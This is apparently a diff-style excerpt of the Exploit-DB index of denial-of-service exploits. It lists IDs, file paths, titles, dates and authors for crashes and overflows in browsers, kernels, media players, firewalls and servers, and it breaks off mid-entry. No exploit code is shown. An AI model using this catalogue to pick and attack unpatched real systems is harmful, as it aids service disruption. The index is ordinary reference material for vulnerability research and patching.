-40374,exploits/windows/dos/40374.html,"Microsoft Internet Explorer 11.0.9600.18482 - Use After Free",2016-09-13,"Marcin Ressel",windows,dos, -28880,exploits/windows/dos/28880.txt,"Microsoft Internet Explorer 6.0/7.0 - 'RemoveChild' Denial of Service",2006-10-30,"Wojciech H",windows,dos, -28894,exploits/windows/dos/28894.txt,"Outpost Firewall PRO 4.0 - Local Denial of Service",2006-11-01,"Matousec Transparent security",windows,dos, -28895,exploits/linux/dos/28895.txt,"Linux Kernel 2.6.x - SquashFS Double-Free Denial of Service",2006-11-02,LMH,linux,dos, -28897,exploits/windows/dos/28897.txt,"Microsoft Internet Explorer 7 - MHTML Denial of Service",2006-11-02,"Positive Technologies",windows,dos, -28911,exploits/solaris/dos/28911.txt,"Sun Solaris 10 - 'UFS' Local Denial of Service",2006-11-04,LMH,solaris,dos, -28912,exploits/linux/dos/28912.txt,"Linux Kernel 2.6.x - 'ISO9660' Denial of Service",2006-11-05,LMH,linux,dos, -28948,exploits/osx/dos/28948.c,"Apple Mac OSX 10.x - FPathConf System Call Local Denial of Service",2006-11-09,"ilja van sprundel",osx,dos, -28957,exploits/android/dos/28957.txt,"Android Zygote - Socket and Fork Bomb (Denial of Service)",2013-10-14,"Luca Verderame",android,dos, -29007,exploits/osx/dos/29007.html,"Apple Safari 2.0.4 - JavaScript Regular Expression Match Remote Denial of Service",2006-11-14,jbh_cg,osx,dos, -29036,exploits/windows/dos/29036.pl,"Teamtek Universal FTP Server - Multiple Commands Remote Denial of Service Vulnerabilities",2006-11-15,"Praveen Darhanam",windows,dos, -29148,exploits/windows/dos/29148.txt,"ASF Demux for VideoLAN VLC Media Player 2.0.x - Denial of Service (PoC)",2013-10-23,"Pedro Ribeiro",windows,dos, -29076,exploits/windows/dos/29076.html,"Adobe Reader 7.0.x - Multiple Vulnerabilities",2006-11-17,"Michal Bucko",windows,dos, -29144,exploits/osx/dos/29144.txt,"Apple Mac OSX 10.4.8 - UDIF Disk Image Remote Denial of Service",2006-11-20,LMH,osx,dos, -29161,exploits/osx/dos/29161.txt,"Apple Mac OSX 10.4.8 - UDTO Disk Image Remote Denial of Service",2006-11-21,LMH,osx,dos, -29164,exploits/windows/dos/29164.cpp,"FortKnox Personal Firewall 9.0.305.0/10.0.305.0 - Kernel Driver 'fortknoxfw.sys' Memory Corruption",2013-10-24,"Arash Allebrahim",windows,dos, -29170,exploits/windows/dos/29170.c,"Nvidia NView 3.5 - 'Keystone.exe' Local Denial of Service",2006-11-23,Hessam-x,windows,dos, -29172,exploits/windows/dos/29172.txt,"Microsoft Office 97 - HTMLMARQ.OCX Library Denial of Service",2006-11-22,"Michal Bucko",windows,dos, -29204,exploits/netbsd_x86/dos/29204.pl,"NetBSD 3.1 - 'FTPd / Tnftpd' Port Remote Buffer Overflow",2006-12-01,kcope,netbsd_x86,dos, -29229,exploits/windows/dos/29229.txt,"Microsoft Internet Explorer 6 - Frame Src Denial of Service",2006-12-05,"Juan Pablo Lopez",windows,dos, -29236,exploits/windows/dos/29236.html,"Microsoft Internet Explorer 7 - CSS Width Element Denial of Service",2006-12-06,xiam.core,windows,dos, -29285,exploits/windows/dos/29285.txt,"Microsoft Windows Media Player 6.4/10.0 - MID Malformed Header Chunk Denial of Service",2006-12-15,shinnai,windows,dos, -29286,exploits/windows/dos/29286.txt,"Microsoft Windows Explorer - 'explorer.exe .WMV' File Handling Denial of Service",2006-12-15,shinnai,windows,dos, -29287,exploits/windows/dos/29287.txt,"Multiple Vendor Firewall - HIPS Process Spoofing",2006-12-15,"Matousec Transparent security",windows,dos, -29295,exploits/windows/dos/29295.html,"Microsoft Outlook - ActiveX Control Remote Internet Explorer Denial of Service",2006-12-18,shinnai,windows,dos, -29296,exploits/linux/dos/29296.txt,"KDE LibkHTML 4.2 - NodeType Function Denial of Service",2006-12-19,"Federico L. Bossi Bonin",linux,dos, -29297,exploits/hardware/dos/29297.py,"HP Printer FTP Print Server 2.4.5 - List Command Buffer Overflow",2006-12-19,"Joxean Koret",hardware,dos, -29305,exploits/multiple/dos/29305.txt,"FTPRush 1.0.610 - Host Field Local Buffer Overflow",2006-12-22,"Umesh Wanve",multiple,dos, -29307,exploits/windows/dos/29307.c,"SoftMaker Office 2012 - TextMaker Memory Corruption",2013-10-30,"Arash Allebrahim",windows,dos, -29310,exploits/multiple/dos/29310.txt,"WikiReader 1.12 - URL Field Local Buffer Overflow",2006-12-22,"Umesh Wanve",multiple,dos, -29473,exploits/linux/dos/29473.txt,"Squid Proxy 2.5/2.6 - FTP URI Remote Denial of Service",2007-01-16,"David Duncan Ross Palmer",linux,dos, -29362,exploits/multiple/dos/29362.pl,"DB Hub 0.3 - Remote Denial of Service",2006-12-27,"Critical Security",multiple,dos, -40960,exploits/windows/dos/40960.svg,"Microsoft Internet Explorer 11 - MSHTML CPaste­Command::Convert­Bitmapto­Png Heap-Based Buffer Overflow (MS14-056)",2016-12-22,Skylined,windows,dos, -29387,exploits/windows/dos/29387.pl,"Plogue Sforzando 1.665 - Buffer Overflow (SEH) (PoC)",2013-11-03,"Mike Czumak",windows,dos, -29399,exploits/linux/dos/29399.txt,"Multiple PDF Readers - Multiple Remote Buffer Overflows",2007-01-06,LMH,linux,dos, -29402,exploits/hardware/dos/29402.txt,"Packeteer PacketShaper 8.0 - Multiple Buffer Overflow Denial of Service Vulnerabilities",2007-01-08,kian.mohageri,hardware,dos, -29406,exploits/solaris/dos/29406.c,"Sun Solaris 9 - RPC Request Denial of Service",2007-01-09,"Federico L. Bossi Bonin",solaris,dos, -29441,exploits/osx/dos/29441.txt,"Apple Mac OSX 10.4.8 - DMG UFS FFS_MountFS Integer Overflow",2007-01-10,LMH,osx,dos, -29443,exploits/windows/dos/29443.py,"VideoLAN VLC Media Player 0.8.6a - Denial of Service (2)",2007-01-11,shinnai,windows,dos, -29444,exploits/windows/dos/29444.pl,"CA BrightStor ARCserve Backup - Message Engine/Tape Engine Remote Buffer Overflow",2007-01-11,"Tenable NS",windows,dos, -29445,exploits/windows/dos/29445.rb,"Hanso Player 2.5.0 - 'm3u' Buffer Overflow (Denial of Service)",2013-11-05,"Necmettin COSKUN",windows,dos, -29447,exploits/windows/dos/29447.txt,"WinZip 9.0 - Command Line Remote Buffer Overflow",2007-01-12,"Umesh Wanve",windows,dos, -29452,exploits/osx/dos/29452.txt,"Apple Mac OSX 10.4.8 - DMG UFS UFS_LookUp Denial of Service",2007-01-13,LMH,osx,dos, -29454,exploits/osx/dos/29454.txt,"Apple Mac OSX 10.4.8 - DMG HFS+ DO_HFS_TRUNCATE Denial of Service",2007-01-13,LMH,osx,dos, -29455,exploits/windows/dos/29455.py,"RealNetwork RealPlayer 10.5 - '.MID' File Handling Remote Denial of Service",2007-01-15,shinnai,windows,dos, -29458,exploits/linux/dos/29458.txt,"Libgtop2 Library - Local Buffer Overflow",2007-01-15,"Liu Qishuai",linux,dos, -29461,exploits/osx/dos/29461.txt,"Apple WebKit build 18794 - WebCore Remote Denial of Service",2007-01-15,"Tom Ferris",osx,dos, -29463,exploits/windows/dos/29463.c,"Ipswitch WS_FTP 2007 Professional - 'WSFTPURL.exe' Local Memory Corruption",2007-01-15,LMH,windows,dos, -29470,exploits/linux/dos/29470.txt,"Oftpd 0.3.7 - Unsupported Address Family Remote Denial of Service",2007-01-15,anonymous,linux,dos, -29502,exploits/multiple/dos/29502.html,"Transmit 3.5.5 - Remote Heap Overflow",2007-01-20,LMH,multiple,dos, -29503,exploits/windows/dos/29503.py,"KarjaSoft Sami HTTP Server 1.0.4/1.0.5/2.0.1 - Request Remote Denial of Service",2007-01-22,shinnai,windows,dos, -29509,exploits/osx/dos/29509.txt,"Apple Mac OSX 10.4.8 - QuickDraw GetSrcBits32ARGB Remote Memory Corruption",2007-01-23,LMH,osx,dos, -30046,exploits/windows/dos/30046.py,"Computer Associates BrightStor ARCserve Backup 11.5 - mediasvr caloggerd Denial of Service",2007-05-16,"M. Shirk",windows,dos, -30020,exploits/linux/dos/30020.txt,"MySQL 5.0.x - IF Query Handling Remote Denial of Service",2013-12-04,"Neil Kettle",linux,dos, -30023,exploits/windows/dos/30023.txt,"Progress OpenEdge 10b - Multiple Denial of Service Vulnerabilities",2007-05-11,"Eelko Neven",windows,dos, -30024,exploits/linux/dos/30024.txt,"LibEXIF 0.6.x - Exif_Data_Load_Data_Entry Remote Integer Overflow",2007-05-11,"Victor Stinner",linux,dos, -29520,exploits/linux/dos/29520.txt,"GTK2 GDKPixBufLoader - Remote Denial of Service",2007-01-24,"Lubomir Kundrak",linux,dos, -29523,exploits/osx/dos/29523.txt,"Apple Mac OSX 10.4.x - Software Update Format String",2007-01-25,kf,osx,dos, -29531,exploits/windows/dos/29531.txt,"Yahoo! Messenger 8.0 - Notification Message HTML Injection",2007-01-26,"Hai Nam Luke",windows,dos, -29532,exploits/osx/dos/29532.txt,"Apple Installer Package 2.1.5 - Filename Format String",2007-01-27,LMH,osx,dos, -29535,exploits/osx/dos/29535.txt,"Telestream Flip4Mac - 'WMV' File Remote Memory Corruption",2007-01-27,kf,osx,dos, -29536,exploits/windows/dos/29536.html,"Microsoft Internet Explorer 5.0.1 - Multiple ActiveX Controls Denial of Service Vulnerabilities",2007-01-29,"Alexander Sotirov",windows,dos, -29540,exploits/solaris/dos/29540.c,"Sun Solaris 10 - ICMP Remote Denial of Service",2007-01-30,kcope,solaris,dos, -39839,exploits/osx/dos/39839.txt,"Apple QuickTime - '.mov' Parsing Memory Corruption",2016-05-19,"Francis Provencher",osx,dos, -29683,exploits/linux/dos/29683.txt,"Linux Kernel 2.6.x - Audit Subsystems Local Denial of Service",2007-02-27,"Steve Grubb",linux,dos, -29545,exploits/windows/dos/29545.rb,"Hanso Converter 2.4.0 - 'ogg' Buffer Overflow (Denial of Service)",2013-11-12,"Necmettin COSKUN",windows,dos, -29546,exploits/windows/dos/29546.rb,"Provj 5.1.5.8 - 'm3u' Buffer Overflow (PoC)",2013-11-12,"Necmettin COSKUN",windows,dos, -29551,exploits/osx/dos/29551.txt,"Apple Mac OSX 10.4.x - iMovie HD '.imovieproj' Filename Format String",2007-01-30,LMH,osx,dos, -29553,exploits/osx/dos/29553.txt,"Apple Mac OSX 10.4.x - Help Viewer '.help' Filename Format String",2007-01-30,LMH,osx,dos, -29554,exploits/osx/dos/29554.txt,"Apple Mac OSX 10.4.x - iPhoto 'photo://' URL Handling Format String",2007-01-30,LMH,osx,dos, -29555,exploits/osx/dos/29555.txt,"Apple Mac OSX 10.4.x - Safari window.console.log Format String",2007-01-30,LMH,osx,dos, -29558,exploits/windows/dos/29558.c,"Comodo Firewall 2.3.6 - 'CMDMon.SYS' Multiple Denial of Service Vulnerabilities",2007-02-01,"Matousec Transparent security",windows,dos, -29577,exploits/php/dos/29577.php,"PHP 5.2.1 - STR_IReplace Remote Denial of Service",2007-02-09,"Thomas Hruska",php,dos, -29607,exploits/windows/dos/29607.html,"EasyMail Objects 6.x - Connect Method Remote Stack Buffer Overflow",2007-02-02,"Paul Craig",windows,dos, -29613,exploits/windows/dos/29613.txt,"CoolPlayer+ Portable 2.19.4 - Local Buffer Overflow",2013-11-15,"Mike Czumak",windows,dos, -29616,exploits/osx/dos/29616.xml,"Apple iTunes 7.0.2 - XML Parsing Remote Denial of Service",2007-02-19,poplix,osx,dos, -29617,exploits/windows/dos/29617.pl,"News File Grabber 4.1.0.1 - Subject Line Stack Buffer Overflow (1)",2007-02-19,"Parveen Vashishtha",windows,dos, -29618,exploits/windows/dos/29618.c,"News File Grabber 4.1.0.1 - Subject Line Stack Buffer Overflow (2)",2007-02-19,Marsu,windows,dos, -29620,exploits/osx/dos/29620.txt,"Apple Mac OSX 10.4.8 - ImageIO GIF Image Integer Overflow",2007-02-20,"Tom Ferris",osx,dos, -29671,exploits/windows/dos/29671.txt,"Avira Secure Backup 1.0.0.1 Build 3616 - '.reg' Buffer Overflow",2013-11-18,"Julien Ahrens",windows,dos, -29791,exploits/windows/dos/29791.pl,"Boilsoft RM TO MP3 Converter 1.72 - '.wav' Crash (PoC)",2013-11-23,"Akin Tosunlar",windows,dos, -29659,exploits/windows/dos/29659.pl,"Microsoft Windows XP/2003 - Explorer '.WMF' File Handling Denial of Service",2007-02-25,sehato,windows,dos, -29660,exploits/windows/dos/29660.txt,"Microsoft Office 2003 - Denial of Service",2007-02-25,sehato,windows,dos, -29664,exploits/windows/dos/29664.txt,"Microsoft Publisher 2007 - Remote Denial of Service",2007-02-26,"Tom Ferris",windows,dos, -30187,exploits/multiple/dos/30187.txt,"Mbedthis AppWeb 2.2.2 - URL Protocol Format String",2007-06-12,"Nir Rachmel",multiple,dos, -30188,exploits/windows/dos/30188.txt,"Apple Safari - Feed URI Denial of Service",2007-05-13,"Moshe Ben-Abu",windows,dos, -29692,exploits/php/dos/29692.txt,"PHP 3/4/5 - ZendEngine Variable Destruction Remote Denial of Service",2007-03-01,"Stefan Esser",php,dos, -29693,exploits/php/dos/29693.txt,"PHP 4/5 - Executor Deep Recursion Remote Denial of Service",2007-03-01,"Maksymilian Arciemowicz",php,dos, -29707,exploits/windows/dos/29707.txt,"JPEGView 1.0.29 - Crash (PoC)",2013-11-19,"Debasish Mandal",windows,dos, -29713,exploits/linux/dos/29713.html,"KDE Konqueror 3.5 - JavaScript IFrame Denial of Service",2007-03-05,mark,linux,dos, -29716,exploits/linux/dos/29716.txt,"Silc Server 1.0.2 - New Channel Remote Denial of Service",2007-03-06,"Frank Benkstein",linux,dos, -29717,exploits/linux/dos/29717.txt,"radscan conquest 8.2 - Multiple Vulnerabilities",2007-03-07,"Luigi Auriemma",linux,dos, -29720,exploits/linux/dos/29720.txt,"Mozilla Firefox 2.0.0.2 - Document.Cookie Path Argument Denial of Service",2007-03-08,"Nicolas DEROUET",linux,dos, -29721,exploits/windows/dos/29721.pl,"FiSH-irssi - Multiple Remote Buffer Overflow Vulnerabilities",2007-03-08,"ilja van sprundel",windows,dos, -29723,exploits/linux/dos/29723.txt,"Mozilla Firefox 2.0.0.2 - '.GIF' Handling Denial of Service",2007-03-09,Samuel,linux,dos, -29724,exploits/linux/dos/29724.txt,"MySQL 5.0.x - Single Row SubSelect Remote Denial of Service",2007-03-09,S.Streichsbier,linux,dos, -29738,exploits/windows/dos/29738.txt,"Microsoft Windows XP/2000 - 'WinMM.dll' / '.WAV' Remote Denial of Service",2007-03-13,"Michal Majchrowicz",windows,dos, -29740,exploits/windows/dos/29740.txt,"MiniGZip - Controls File_Compress Buffer Overflow",2007-03-14,starcadi,windows,dos, -29743,exploits/windows/dos/29743.txt,"Symantec 'SYMTDI.SYS' Device Driver - Local Denial of Service",2007-03-15,"David Matousek",windows,dos, -29767,exploits/hardware/dos/29767.txt,"ZYXEL Router 3.40 Zynos - SMB Data Handling Denial of Service",2007-03-20,"Joxean Koret",hardware,dos, -29781,exploits/linux/dos/29781.c,"Linux Kernel 2.6.x - IPv6_SockGlue.c Null Pointer Dereference Denial of Service",2007-03-26,"Joey Mengele",linux,dos, -29787,exploits/windows/dos/29787.py,"HP JetDirect FTP Print Server - RERT Command Denial of Service",2007-01-18,Handrix,windows,dos, -30110,exploits/linux/dos/30110.c,"Bochs 2.3 - Buffer Overflow / Denial of Service",2007-05-31,"Tavis Ormandy",linux,dos, -30139,exploits/multiple/dos/30139.c,"Agnitum Outpost Firewall 4.0 - Outpost_IPC_HDR Local Denial of Service",2007-06-04,"Matousec Transparent security",multiple,dos, -30160,exploits/windows/dos/30160.txt,"Microsoft Windows XP - GDI+ '.ICO' File Remote Denial of Service",2007-06-06,"Dennis Rand",windows,dos, -30163,exploits/multiple/dos/30163.html,"Blue Coat Systems K9 Web Protection 32.36 - Remote Buffer Overflow",2007-06-08,"Dennis Rand",multiple,dos, -30167,exploits/hardware/dos/30167.txt,"Packeteer PacketShaper 7.x - Web Interface Remote Denial of Service",2007-06-08,nnposter,hardware,dos, -29800,exploits/windows/dos/29800.py,"Microsoft Internet Explorer 7 - HTML Denial of Service",2007-03-28,shinnai,windows,dos, -29803,exploits/windows/dos/29803.pl,"Static HTTP Server 1.0 - Denial of Service",2013-11-25,GalaxyAndroid,windows,dos, -29809,exploits/linux/dos/29809.txt,"PulseAudio 0.9.5 - 'Assert()' Remote Denial of Service",2007-04-02,"Luigi Auriemma",linux,dos, -29810,exploits/windows/dos/29810.c,"Symantec (Multiple Products) - 'SPBBCDrv' Driver Local Denial of Service",2007-04-01,"David Matousek",windows,dos, -29813,exploits/windows/dos/29813.py,"Microsoft Windows Vista - ARP Table Entries Denial of Service",2004-04-02,"Kristian Hermansen",windows,dos, -29816,exploits/windows/dos/29816.c,"FastStone Image Viewer 2.9/3.6 - '.bmp' Image Handling Memory Corruption",2007-04-04,"Ivan Fratric",windows,dos, -29818,exploits/windows/dos/29818.c,"ACDSee 9.0 Photo Manager - Multiple '.BMP' Denial of Service Vulnerabilities",2007-04-04,"Ivan Fratric",windows,dos, -29819,exploits/windows/dos/29819.c,"IrfanView 3.99 - Multiple .BMP Denial of Service Vulnerabilities",2007-04-04,"Ivan Fratric",windows,dos, -29823,exploits/php/dos/29823.c,"PHP 5.2.1 'GD' Extension - '.WBMP' File Integer Overflow",2007-04-07,"Ivan Fratric",php,dos, -29826,exploits/linux/dos/29826.txt,"Linux Kernel 2.6.x - AppleTalk ATalk_Sum_SKB Function Denial of Service",2007-04-09,"Jean Delvare",linux,dos, -29937,exploits/windows/dos/29937.txt,"Aventail Connect 4.1.2.13 - Hostname Remote Buffer Overflow",2007-04-30,"Thomas Pollet",windows,dos, -29850,exploits/windows/dos/29850.txt,"eIQnetworks Enterprise Security Analyzer 2.5 - Multiple Buffer Overflow Vulnerabilities",2007-04-12,"Leon Juranic",windows,dos, -29860,exploits/windows/dos/29860.c,"ZoneAlarm 6.1.744.001/6.5.737.000 - Vsdatant.SYS Driver Local Denial of Service",2007-04-15,"Matousec Transparent security",windows,dos, -29867,exploits/windows/dos/29867.xml,"NetSprint Ask IE Toolbar 1.1 - Multiple Denial of Service Vulnerabilities",2007-04-17,"Michal Bucko",windows,dos, -29875,exploits/multiple/dos/29875.py,"AMSN 0.96 - Malformed Message Denial of Service",2007-04-21,"Levent Kayan",multiple,dos, -29896,exploits/windows/dos/29896.c,"Cdelia Software ImageProcessing - '.BMP' File Denial of Service",2007-04-24,Dr.Ninux,windows,dos, -29900,exploits/multiple/dos/29900.txt,"Asterisk 1.4 SIP T.38 SDP - Parsing Remote Stack Buffer Overflow (1)",2007-03-21,"Barrie Dempster",multiple,dos, -29901,exploits/multiple/dos/29901.txt,"Asterisk 1.4 SIP T.38 SDP - Parsing Remote Stack Buffer Overflow (2)",2007-03-21,"Barrie Dempster",multiple,dos, -29916,exploits/linux/dos/29916.c,"Linux Kernel 2.6.x - NETLINK_FIB_LOOKUP Local Denial of Service",2007-04-26,"Alexey Kuznetsov",linux,dos, -29919,exploits/hardware/dos/29919.py,"TP-Link TL-WR740N / TL-WR740ND 150M Wireless Lite N Router - HTTP Denial of Service",2013-11-30,"Dino Causevic",hardware,dos, -29920,exploits/linux/dos/29920.py,"Uptime Agent 5.0.1 - Stack Overflow",2013-11-30,"Denis Andzakovic",linux,dos, -29926,exploits/windows/dos/29926.pl,"Audacious Player 3.4.2/3.4.1 - '.mp3' Crash (PoC)",2013-11-30,"Akin Tosunlar",windows,dos, -29934,exploits/windows/dos/29934.py,"ZIP Password Recovery Professional 5.1 - '.zip' Crash (PoC)",2013-11-30,KAI,windows,dos, -29939,exploits/linux/dos/29939.txt,"X.Org X Window System Xserver 1.3 - XRender Extension Divide by Zero Denial of Service",2007-05-01,"Derek Abdine",linux,dos, -29940,exploits/windows/dos/29940.html,"Mozilla Firefox 2.0.0.3 - Href Denial of Service",2007-05-01,"Carl Hardwick",windows,dos, -29942,exploits/windows/dos/29942.c,"Atomix MP3 - '.MP3' File Buffer Overflow",2007-05-02,preth00nker,windows,dos, -29943,exploits/windows/dos/29943.pl,"Progress WebSpeed 3.0/3.1 - Denial of Service",2007-05-02,"Eelko Neven",windows,dos, -29949,exploits/windows/dos/29949.c,"Zoo 2.10 - .ZOO Compression Algorithm Remote Denial of Service",2007-05-04,Jean-Sébastien,windows,dos, -30080,exploits/linux/dos/30080.c,"Linux Kernel 2.6.x - VFat Compat IOCTLS Local Denial of Service",2007-05-24,"Bart Oldeman",linux,dos, -30091,exploits/linux/dos/30091.py,"OpenOffice 2.2 Writer Component - Remote Denial of Service",2007-05-28,shinnai,linux,dos, -30104,exploits/windows/dos/30104.nasl,"F-Secure Policy Manager 7.00 - 'FSMSH.dll' Remote Denial of Service",2007-05-30,"David Maciejak",windows,dos, -30193,exploits/windows/dos/30193.html,"Apple Safari 3.0.1 for Windows - 'Corefoundation.dll' Denial of Service",2007-06-16,Lostmon,windows,dos, -30194,exploits/windows/dos/30194.txt,"Apple Safari 3 for Windows - 'Document.Location' Denial of Service",2007-06-16,azizov,windows,dos, -30224,exploits/windows/dos/30224.py,"Ingress Database Server 2.6 - Multiple Remote Vulnerabilities",2007-06-21,anonymous,windows,dos, -30233,exploits/windows/dos/30233.pl,"LiteWEB Web Server 2.7 - Invalid Page Remote Denial of Service",2007-06-25,Prili,windows,dos, -30251,exploits/linux/dos/30251.c,"GD Graphics Library 2.0.34 - 'libgd' gdImageCreateXbm Function Unspecified Denial of Service",2007-06-26,anonymous,linux,dos, -30252,exploits/windows/dos/30252.py,"Conti FTP Server 1.0 - Large String Denial of Service",2007-06-27,35c666,windows,dos, -30255,exploits/windows/dos/30255.txt,"PC SOFT WinDEV 11 - '.WDP' File Parsing Stack Buffer Overflow",2007-06-28,"Jerome Athias",windows,dos, -40743,exploits/windows/dos/40743.html,"VBScript 5.8.7600.16385/5.8.9600.16384 - RegExpComp::PnodeParse Out-of-Bounds Read",2016-11-09,Skylined,windows,dos, -30308,exploits/windows/dos/30308.py,"PotPlayer 1.5.42509 Beta - Integer Division by Zero Denial of Service",2013-12-15,sajith,windows,dos, -30314,exploits/windows/dos/30314.txt,"Yahoo! Messenger 8.1 - Address Book Remote Buffer Overflow",2007-07-16,"Rajesh Sethumadhavan",windows,dos, -30791,exploits/multiple/dos/30791.txt,"I Hear U 0.5.6 - Multiple Remote Denial of Service Vulnerabilities",2007-11-19,"Luigi Auriemma",multiple,dos, -30395,exploits/php/dos/30395.txt,"PHP - 'openssl_x509_parse()' Memory Corruption",2013-12-17,"Stefan Esser",php,dos, -30397,exploits/windows/dos/30397.txt,"Microsoft Windows Kernel - 'win32k.sys' Integer Overflow (MS13-101)",2013-12-17,"Core Security",windows,dos, -30401,exploits/php/dos/30401.php,"T1lib - intT1_Env_GetCompletePath Buffer Overflow",2007-07-26,r0ut3r,php,dos, -30413,exploits/windows/dos/30413.py,"PotPlayer 1.5.40688 - '.avi' File Handling Memory Corruption",2013-12-20,ariarat,windows,dos, -31464,exploits/windows/dos/31464.pl,"Surgemail 3.8 - IMAP LSUB Command Remote Stack Buffer Overflow",2008-03-21,"Leon Juranic",windows,dos, -30414,exploits/windows/dos/30414.py,"GOM Player 2.2.56.5158 - '.avi' File Handling Memory Corruption",2013-12-20,ariarat,windows,dos, -30422,exploits/windows/dos/30422.py,"Easy Karaokay Player 3.3.31 - '.wav' Integer Division by Zero",2013-12-22,"Osanda Malith",windows,dos, -30430,exploits/linux/dos/30430.txt,"Fail2ban 0.8 - Remote Denial of Service",2007-07-28,"Daniel B. Cid",linux,dos, -30444,exploits/linux/dos/30444.txt,"KDE Konqueror 3.5.7 - Assert Denial of Service",2007-03-05,"Thomas Waldegger",linux,dos, -30455,exploits/windows/dos/30455.txt,"Microsoft Internet Explorer 6 - Position:Relative Denial of Service",2007-08-07,Hamachiya2,windows,dos, -30462,exploits/windows/dos/30462.py,"Microsoft Windows Media Player 11 - AU Divide-by-Zero Denial of Service",2007-08-08,"A.Sawan & nophie",windows,dos, -30494,exploits/windows/dos/30494.html,"Microsoft Internet Explorer 5.0.1 - Vector Markup Language 'VGX.dll' Remote Buffer Overflow",2007-08-14,"Ben Nagy & Derek Soeder",windows,dos, -30497,exploits/multiple/dos/30497.c,"Zoidcom 0.6.x - Malformed Packet Denial of Service",2007-08-14,"Luigi Auriemma",multiple,dos, -30498,exploits/multiple/dos/30498.txt,"Live For Speed S1/S2 - Multiple Vulnerabilities",2007-08-14,"Luigi Auriemma",multiple,dos, -30500,exploits/windows/dos/30500.txt,"Yahoo! Messenger 8.1 - 'KDU_V32M.DLL' Remote Denial of Service",2007-08-15,team509,windows,dos, -30506,exploits/hardware/dos/30506.txt,"Cisco IOS 12.3 - Show IP BGP Regexp Remote Denial of Service",2007-08-17,anonymous,hardware,dos, -30512,exploits/windows/dos/30512.txt,"Total Commander FileInfo 2.09 Plugin - Multiple PE File Denial of Service Vulnerabilities",2007-07-20,"Gynvael Coldwind",windows,dos, -30513,exploits/multiple/dos/30513.txt,"Epic Games Unreal Engine Logging Function - Remote Denial of Service",2007-08-20,"Luigi Auriemma",multiple,dos, -30517,exploits/hardware/dos/30517.pl,"Grandstream GXV-3000 Phone - Remote Denial of Service",2007-08-22,MADYNES,hardware,dos, -30519,exploits/multiple/dos/30519.txt,"Asura Engine Challenge B Query - Remote Stack Buffer Overflow",2007-08-22,"Luigi Auriemma",multiple,dos, -30524,exploits/multiple/dos/30524.txt,"Soldat 1.4.2 - Multiple Remote Denial of Service Vulnerabilities",2007-08-23,"Luigi Auriemma",multiple,dos, -30526,exploits/multiple/dos/30526.txt,"Vavoom 1.24 - sv_main.cpp Say Command Remote Format String",2007-08-24,"Luigi Auriemma",multiple,dos, -30527,exploits/multiple/dos/30527.txt,"Vavoom 1.24 - str.cpp VStr::Resize Function Crafted UDP Packet Remote Denial of Service",2007-08-24,"Luigi Auriemma",multiple,dos, -30528,exploits/multiple/dos/30528.txt,"Vavoom 1.24 - 'p_thinker.cpp VThinker::BroadcastPrintf' Multiple Remote Overflows",2007-08-24,"Luigi Auriemma",multiple,dos, -30529,exploits/multiple/dos/30529.txt,"Media Player Classic 6.4.9 - FLI File Remote Buffer Overflow",2007-08-24,wushi,multiple,dos, -30530,exploits/hardware/dos/30530.pl,"Thomson SpeedTouch ST 2030 (SIP Phone) - SIP Invite Message Remote Denial of Service",2007-08-27,"Humberto J. Abdelnur",hardware,dos, -30538,exploits/hardware/dos/30538.pl,"Thomson SpeedTouch 2030 - SIP Empty Message Remote Denial of Service",2007-08-28,"Humberto J. Abdelnur",hardware,dos, -30540,exploits/multiple/dos/30540.txt,"Blizzard Entertainment StarCraft Brood War 1.15.1 - Minimap Preview Remote Denial of Service",2007-08-28,"Gynvael Coldwind",multiple,dos, -30542,exploits/linux/dos/30542.txt,"EnterpriseDB Advanced Server 8.2 - Uninitialized Pointer",2007-08-29,"Joxean Koret",linux,dos, -30544,exploits/windows/dos/30544.txt,"Yahoo! Messenger 8.1 - File Transfer Denial of Service",2007-08-29,SlicK,windows,dos, -30550,exploits/windows/dos/30550.php,"Ofilter Player 1.1 - '.wav' Integer Division by Zero",2013-12-28,"Osanda Malith",windows,dos, -30566,exploits/multiple/dos/30566.txt,"Alien Arena 2007 6.10 - Multiple Remote Vulnerabilities",2007-09-05,"Luigi Auriemma",multiple,dos, -30574,exploits/multiple/dos/30574.txt,"CellFactor REvolution 1.03 - Multiple Remote Code Execution Vulnerabilities",2007-09-10,"Luigi Auriemma",multiple,dos, -30578,exploits/linux/dos/30578.txt,"MPlayer 1.0 - AVIHeader.C Heap Based Buffer Overflow",2007-09-12,"Code Audit Labs",linux,dos, -30579,exploits/linux/dos/30579.txt,"Media Player Classic 6.4.9 - Malformed AVI Header Multiple Remote Vulnerabilities",2007-09-12,"Code Audit Labs",linux,dos, -32400,exploits/multiple/dos/32400.html,"Foxmail Email Client 6.5 - 'mailto' Buffer Overflow",2008-09-22,sebug,multiple,dos, -31913,exploits/windows/dos/31913.pl,"Music AlarmClock 2.1.0 - '.m3u' Crash (PoC)",2014-02-26,"Gabor Seljan",windows,dos, -32705,exploits/windows/dos/32705.py,"EagleGet 1.1.8.1 - Denial of Service",2014-04-06,"Interference Security",windows,dos, -30580,exploits/linux/dos/30580.txt,"KMPlayer 2.9.3.1214 - Multiple Remote Denial of Service Vulnerabilities",2007-09-12,"Code Audit Labs",linux,dos, -30584,exploits/linux/dos/30584.py,"Boa 0.93.15 - Administrator Password Overwrite Authentication Bypass",2007-09-14,"Luca Carettoni",linux,dos, -30590,exploits/windows/dos/30590.txt,"WinImage 8.0/8.10 - '.IMG' File BPB_BytsPerSec Field Denial of Service",2007-09-17,j00ru//vx,windows,dos, -30592,exploits/multiple/dos/30592.py,"Python 2.2 ImageOP Module - Multiple Integer Overflow Vulnerabilities",2007-09-17,"Slythers Bro",multiple,dos, -30593,exploits/windows/dos/30593.txt,"Microsoft MFC Library - CFileFind::FindFile Buffer Overflow",2007-09-14,"Jonathan Sarba",windows,dos, -30619,exploits/windows/dos/30619.txt,"Microsoft Windows Explorer - '.png' Image Local Denial of Service",2007-07-26,"Xavier Roche",windows,dos, -30628,exploits/windows/dos/30628.txt,"FSD 2.052/3.000 - servinterface.cc servinterface::sendmulticast Function PIcallsign Command Remote Overflow",2007-10-01,"Luigi Auriemma",windows,dos, -30644,exploits/multiple/dos/30644.txt,"Dawn of Time 1.69 MUD Server - Multiple Format String Vulnerabilities",2007-10-05,"Luigi Auriemma",multiple,dos, -30646,exploits/linux/dos/30646.txt,"Nagios Plugins 1.4.2/1.4.9 - Location Header Remote Buffer Overflow",2007-07-16,"Nobuhiro Ban",linux,dos, -30648,exploits/linux/dos/30648.txt,"AlsaPlayer 0.99.x - Vorbis Input Plugin OGG Processing Remote Buffer Overflow",2007-10-08,Erik,linux,dos, -30797,exploits/windows/dos/30797.html,"Aurigma Image Uploader 4.x - ActiveX 